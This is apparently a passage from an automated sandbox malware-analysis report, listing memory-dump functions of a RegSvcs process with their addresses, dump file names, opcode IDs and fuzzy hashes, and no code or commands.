                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3546a60cccbe2dd26d0ba0aa2a9fce985cf57130c1e28ed9082b72c7cc366257
                                                                        • Instruction ID: b8ab6297180620bfad018d4fdc7a847a1327df6a91bd4b93840a5b1322031d2f
                                                                        • Opcode Fuzzy Hash: 3546a60cccbe2dd26d0ba0aa2a9fce985cf57130c1e28ed9082b72c7cc366257
                                                                        • Instruction Fuzzy Hash: CAE14B70A10218AFDB45DFA8D480A9DBBF2FF89310F25C15AE945AB351DB31ED45CB90
                                                                        Function 063E3138 Relevance: .2, Instructions: 245COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3e8a35c1afdd9fe622a2ab33a5a21bb5d00caf9b1d57304a43dbd043f8b67144
                                                                        • Instruction ID: a6e7646cf74d37379a09e79f140b2d094d11cb843a717717110a98f5519ed715
                                                                        • Opcode Fuzzy Hash: 3e8a35c1afdd9fe622a2ab33a5a21bb5d00caf9b1d57304a43dbd043f8b67144
                                                                        • Instruction Fuzzy Hash: AA918035B002149FDB54DF68C884EAEBBF6EF89710B15809AE905EB361DB71EC44CB61
                                                                        Function 063E11A8 Relevance: .2, Instructions: 207COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 68505fed8d75436f823d36b0c673da938d2c077552c807c160588afad40328fd
                                                                        • Instruction ID: 61f7ebacd3121aefde87225041756da1364f36a78aa62c9a2fec06074c1cb4ae
                                                                        • Opcode Fuzzy Hash: 68505fed8d75436f823d36b0c673da938d2c077552c807c160588afad40328fd
                                                                        • Instruction Fuzzy Hash: 90615732B043248FDB549AB9DC4056ABBB5AFD6211B18817FD805CB291EB31C948C7F1
                                                                        Function 06DFFAF6 Relevance: .1, Instructions: 142COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 79c2eab81e31c112b9796a621b9720d2c842cc399ecd1b1f2225fc99ebb969db
                                                                        • Instruction ID: ac9ac2849409c92c92b30bb1073d6ec21b1ac870801e2e94a1eb339f99a84117
                                                                        • Opcode Fuzzy Hash: 79c2eab81e31c112b9796a621b9720d2c842cc399ecd1b1f2225fc99ebb969db
                                                                        • Instruction Fuzzy Hash: E551F574A002099FDB05DFA8D584A9DBBF2FF89304F24C159E805AB361DB31AD85CB90
                                                                        Function 06DFDB58 Relevance: .1, Instructions: 133COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 628934cf45a63d7a381885665b38bc69496d512baa45205925ac61c1e3c1faa5
                                                                        • Instruction ID: 4ff746b51cf7c6ddbe85bc1c199501449a83959274b09aabe99a31a158256914
                                                                        • Opcode Fuzzy Hash: 628934cf45a63d7a381885665b38bc69496d512baa45205925ac61c1e3c1faa5
                                                                        • Instruction Fuzzy Hash: 3051ACB1A00305DFD745DF68D48499EBBF2FF89304B1586A9E4499B322DB30EE45CB91
                                                                        Function 06DFDB68 Relevance: .1, Instructions: 130COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d3d945dbe850ec9656bebc77d2c92e0e419b3ca865d3f2a9c2fd5bcfe806ca1
                                                                        • Instruction ID: cca5274869ca170bf5e272cac5f2c508d476a4e5364e72c2cf028a80ce34abc1
                                                                        • Opcode Fuzzy Hash: 9d3d945dbe850ec9656bebc77d2c92e0e419b3ca865d3f2a9c2fd5bcfe806ca1
                                                                        • Instruction Fuzzy Hash: AF518C75A00305DFD744DF68D48499EBBF2FF89314B158AA9E4198B322DB30ED45CB90
                                                                        Function 06DFECA0 Relevance: .1, Instructions: 118COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8de6e669410c23c9b68bc821bb8f5991027b1636ea91d699f5aa85aa945c5fa1
                                                                        • Instruction ID: d52ab652ff5f2e7941ca1fa20a53fece0ddc4f731d9eef9abc2a15e93e80a68e
                                                                        • Opcode Fuzzy Hash: 8de6e669410c23c9b68bc821bb8f5991027b1636ea91d699f5aa85aa945c5fa1
                                                                        • Instruction Fuzzy Hash: F8411131A006059FDB68DF69D8142AEBBF2AFC8200F25866DD406E7761DB31DD4AC7C1
                                                                        Function 00FDD054 Relevance: .1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625512076.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fdd000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 94a5eb51d8f59b9d249a9bf73ac49c9349550feba965e87b740e9bf40819f08d
                                                                        • Instruction ID: a1417f213220cfa630d2ba6c42c9c906c7a8ff868943c389ba77f65db552ee36
                                                                        • Opcode Fuzzy Hash: 94a5eb51d8f59b9d249a9bf73ac49c9349550feba965e87b740e9bf40819f08d
                                                                        • Instruction Fuzzy Hash: A6212B72900244EFDF15DF50D8C4B26BB66FBC8314F28C15AE9090B346C336D816EB62
                                                                        Function 00FED474 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625604134.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fed000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c39049d17817670f6631d384a54c5ff053e6acc3a656bf53daac53078cae9ff0
                                                                        • Instruction ID: 2eb378d8aae65b03c7d295c0b4db204c82ef57e6ee2224159ff7e3d1ec933074
                                                                        • Opcode Fuzzy Hash: c39049d17817670f6631d384a54c5ff053e6acc3a656bf53daac53078cae9ff0
                                                                        • Instruction Fuzzy Hash: 54212971904384EFDB04DF55D9C0B26BB65FB84328F24C56DE80A4B696C336D846DA62
                                                                        Function 00FED2C4 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625604134.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fed000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bdadc67423993b937bc36b92c9195785397705185b5d2a3dfb644003dd601e77
                                                                        • Instruction ID: 3bea7601ad1f50d8395d87b45302d73fe5389a233a5e0860f22eba17360c844f
                                                                        • Opcode Fuzzy Hash: bdadc67423993b937bc36b92c9195785397705185b5d2a3dfb644003dd601e77
                                                                        • Instruction Fuzzy Hash: 30210876904284EFDB10DF15D9C0B2ABB65FB84324F24C56DD8494B646C33AD846DAA3
                                                                        Function 06DFDAB7 Relevance: .1, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a50f2ed5b7fc0fcded94bffc86608042f6d96587791da92c465f36d197a2b4ad
                                                                        • Instruction ID: b3814ef0ebcff0fe8a396c681d27e36cd295d151fdcb3a92604f46d429b263c5
                                                                        • Opcode Fuzzy Hash: a50f2ed5b7fc0fcded94bffc86608042f6d96587791da92c465f36d197a2b4ad
                                                                        • Instruction Fuzzy Hash: 6F2105356142449FCB01DF68D884DAEBBB2FF89324B148099E549CF362C771ED02CB91
                                                                        Function 06DFC0A8 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2391e3668f4331519866e6c618a297f74f259a46383bf0f4a9895768ce49b44e
                                                                        • Instruction ID: 695f14a2f5905fa9a1a4028b4b66f13f4e869e4a09a29747907f2dd25fa0ab85
                                                                        • Opcode Fuzzy Hash: 2391e3668f4331519866e6c618a297f74f259a46383bf0f4a9895768ce49b44e
                                                                        • Instruction Fuzzy Hash: F5118C39715218AFD7548F649C40BAB7BA6EF89220F14815AFA469B292C631DD11CBA0
                                                                        Function 00FDD04F Relevance: .1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625512076.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fdd000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 36dba3e712238e0a66f9469a116caccf835c09763754274a0d957b5f10e5b951
                                                                        • Instruction ID: 25f04e20a5597c58d05dfef4a53adccec65177c43b045fe340642ee4d0634dc5
                                                                        • Opcode Fuzzy Hash: 36dba3e712238e0a66f9469a116caccf835c09763754274a0d957b5f10e5b951
                                                                        • Instruction Fuzzy Hash: 3521C072804280DFDB06CF00D9C0B16BF72FB88324F2882AAD9480A256C33AD416DB92
                                                                        Function 06DFC0B8 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c53e16a257a50acefb026cc3c05904896c1e312a0f87a227066fedaa7db56f7e
                                                                        • Instruction ID: d8e2ba0e9c837a4a52da8e89f92ac316b0bcd3468f4f4c6b8dd233c4a8396a2e
                                                                        • Opcode Fuzzy Hash: c53e16a257a50acefb026cc3c05904896c1e312a0f87a227066fedaa7db56f7e
                                                                        • Instruction Fuzzy Hash: 7C118235710214EFD7548F65DC44BAB7BA6EB84310F208469FA458B381C771ED11C7A0
                                                                        Function 063E13F0 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b9e2f029be5368a2fcaadb3c6ad3a5a51ad292c19dbe9aad08f7e5fa6791066e
                                                                        • Instruction ID: aac1ba5c1ba3cd2a6381b5d8fa8d0222f9703fda03a6f6d4f22ae4f8aed322d7
                                                                        • Opcode Fuzzy Hash: b9e2f029be5368a2fcaadb3c6ad3a5a51ad292c19dbe9aad08f7e5fa6791066e
                                                                        • Instruction Fuzzy Hash: D60128777002218BD7949A6ED8106B6F7EACBC5266718807FDA06C7380DE71D842CBF1
                                                                        Function 06DFFC5D Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb0291ca47715008899e20f287f3e7075ff447dde5d6785e3267034e54730094
                                                                        • Instruction ID: e24c509a0140e56678eef4e866ee1f227bfe4a07986f45782916e314c1d83db1
                                                                        • Opcode Fuzzy Hash: fb0291ca47715008899e20f287f3e7075ff447dde5d6785e3267034e54730094
                                                                        • Instruction Fuzzy Hash: 6E210474A10209DFDB45DFA8D584ADDBBF2AF49300F25C599E804BB260D731AE85CB90
                                                                        Function 06DFEC8F Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1c9587d8d4d6fd6baca30f66a6d1cacb74fd26752e96c0a232af47c1b79f6ade
                                                                        • Instruction ID: 3ea4c5a2a0961b5d31888053a549db5122f20050ade5481a532183be3570bba6
                                                                        • Opcode Fuzzy Hash: 1c9587d8d4d6fd6baca30f66a6d1cacb74fd26752e96c0a232af47c1b79f6ade
                                                                        • Instruction Fuzzy Hash: 1311A531A111499BDB68CF68DD146EDBBF29FC8201F15417DD846F3A55CB328E46CB90
                                                                        Function 00FED2BF Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625604134.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fed000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                                        • Instruction ID: 91d496c317e9129c7d4ffe3104f0fd7546555928dc4d60d951453d40eea1d738
                                                                        • Opcode Fuzzy Hash: 0087aa9c0370ffbcc44a91c72dac69a08dec4055da452c00f01411939cf63ad0
                                                                        • Instruction Fuzzy Hash: 7611B275904684DFDB11CF10D5C4B19FF61FB84324F24C6AAD8494BA56C33AD846CBA2
                                                                        Function 00FED46F Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625604134.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fed000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction ID: ec625426929550d576677a108553fcb0ebb14dd59fafeccc7c7e8dd2f0804907
                                                                        • Opcode Fuzzy Hash: a6f14a2633b0976cf55fba98dc8f49a251bcab79b87bdac7509de7911a20ab2c
                                                                        • Instruction Fuzzy Hash: A4118E75904680DFCB05CF10D9C4B15BB71FB84328F28C6AAD8494B656C33AD84ADB52
                                                                        Function 06DFF448 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46df3c7f99304a7f2deb1ba361a6f1f108e3ddb5ba3fb4898314bcd0d93f3256
                                                                        • Instruction ID: 77ab6ed08f1f071852ce5fcf9342ed19e67de2de5ed1632e8880faed3618a40b
                                                                        • Opcode Fuzzy Hash: 46df3c7f99304a7f2deb1ba361a6f1f108e3ddb5ba3fb4898314bcd0d93f3256
                                                                        • Instruction Fuzzy Hash: 45012B11A0E3B45FD3426F7C6C642EF3FB59E87510309409BD106CF396DA18894A83D7
                                                                        Function 06DFDAC8 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0fc5d4ca79bd62ee130b42ac55b3653a8f4f676b055fd722fe756279311118de
                                                                        • Instruction ID: ef5cfce07f0687b6e4fa767c5f56682faafa9418248590c32c376c3d58f2ef84
                                                                        • Opcode Fuzzy Hash: 0fc5d4ca79bd62ee130b42ac55b3653a8f4f676b055fd722fe756279311118de
                                                                        • Instruction Fuzzy Hash: DD1170356002059FCB04DF68D884D9EBBB6FF89324B148169E9198F362DB72ED02CB91
                                                                        Function 06DFCDE8 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e205402fa71a5795bdc4534512cc64d6a420518589b751e3611f0d017150a377
                                                                        • Instruction ID: 20bafc818aec43f155ba2902dcb831067e4ebcaf7e3c96e326107105e07ec4a9
                                                                        • Opcode Fuzzy Hash: e205402fa71a5795bdc4534512cc64d6a420518589b751e3611f0d017150a377
                                                                        • Instruction Fuzzy Hash: B211F531A28398DFCB01CF28D8546AABFB2BF89310F0540AAED44D7381D7B09C54C7A1
                                                                        Function 00FDDA6D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625512076.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fdd000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0d2744a437ebf8b8303fb7480232bcbcb670cd2e3d191a1fceb0333b46df6783
                                                                        • Instruction ID: 219a5118987fbadd9a1d7fd48bf84a4fb561b6f1632b96cd3e555885850de1a7
                                                                        • Opcode Fuzzy Hash: 0d2744a437ebf8b8303fb7480232bcbcb670cd2e3d191a1fceb0333b46df6783
                                                                        • Instruction Fuzzy Hash: B101DF72408308AAEB108A65D880B66BB98EB41774F1CC05BED094A383D37C9840DA72
                                                                        Function 063E13D5 Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1658519915.00000000063E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_63e0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5905c1ff08e253191434d432b8f87a1dc73a297e86837bc44a7fc11a5d88ee7a
                                                                        • Instruction ID: 819bfb0a390314b526938adf437bb1840397ee5e380f926881fa72820c5bda2f
                                                                        • Opcode Fuzzy Hash: 5905c1ff08e253191434d432b8f87a1dc73a297e86837bc44a7fc11a5d88ee7a
                                                                        • Instruction Fuzzy Hash: E7F0F0372093908FC7130A669C205F1BFBA8D8322130A40D7E980C72A2DA35684ACBB3
                                                                        Function 06DFF3D8 Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5a73eade04c465c789646feb1eef6449ed7d556592d67bed546546aaf68f8c1b
                                                                        • Instruction ID: f1dbd903a6313697e464e3c8fc717b43eea7d46991adcc2a045d312242fab28f
                                                                        • Opcode Fuzzy Hash: 5a73eade04c465c789646feb1eef6449ed7d556592d67bed546546aaf68f8c1b
                                                                        • Instruction Fuzzy Hash: 4DF0E932F282258F9B48DFA8B4004AA77E9EB8817571500BBE10ECB240EF71D941C784
                                                                        Function 00FDDA6C Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1625512076.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_fdd000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bdd6227c0ac7569f35359fa0f2da2a72eeac4aa970008cb07afaaac4e2021a37
                                                                        • Instruction ID: e05935a00b48d0f2c9e375e58af3067ca8aca9f4217fcacb7a27454676ddb674
                                                                        • Opcode Fuzzy Hash: bdd6227c0ac7569f35359fa0f2da2a72eeac4aa970008cb07afaaac4e2021a37
                                                                        • Instruction Fuzzy Hash: 99F06271448348AEE7108A16D884B66FFD8EB51774F18C45AED484B287D2799C44CA71
                                                                        Function 06DFF438 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4c207ecfd0c4b555eb61acfea16449ef5c9732af55c9de9a5e34217c9b9f1210
                                                                        • Instruction ID: 49a21f64c0a560d21ddc998aaf578d579ffa4cbf926f6ebdaccbbd0e2eae4cdc
                                                                        • Opcode Fuzzy Hash: 4c207ecfd0c4b555eb61acfea16449ef5c9732af55c9de9a5e34217c9b9f1210
                                                                        • Instruction Fuzzy Hash: 30D0A912A4F2F14B83033378B8200CABF25890792530A41E3E95CCF207D4148E8A83C2
                                                                        Function 06DFEFD2 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f746865b32367c36aed44872c7641f5789323fdfd0fc49be98a1b523d4efb86
                                                                        • Instruction ID: 25560c2f2f68c1c2dd6f052677ea1ef0277492f6b59f13a07dda03233d6fe6c3
                                                                        • Opcode Fuzzy Hash: 7f746865b32367c36aed44872c7641f5789323fdfd0fc49be98a1b523d4efb86
                                                                        • Instruction Fuzzy Hash: 22D0127510C3C08FC303DB24EA604417F72DF9770134544E6D5C4C7556C6304C16C716
                                                                        Function 06DFE1AD Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1666702910.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_6df0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d0d54b71ed1605dd88bf2d354172f6cf726ce61208ebe4016d5b920b41040d31
                                                                        • Instruction ID: 51ba0f154667d9afeeae9e43a11a54c82e710419faecd42d64876d9b138b7579
                                                                        • Opcode Fuzzy Hash: d0d54b71ed1605dd88bf2d354172f6cf726ce61208ebe4016d5b920b41040d31
                                                                        • Instruction Fuzzy Hash: 9BC01230309240DFC301C718D9614197FB25FC12047064453A18597576C5225C10C651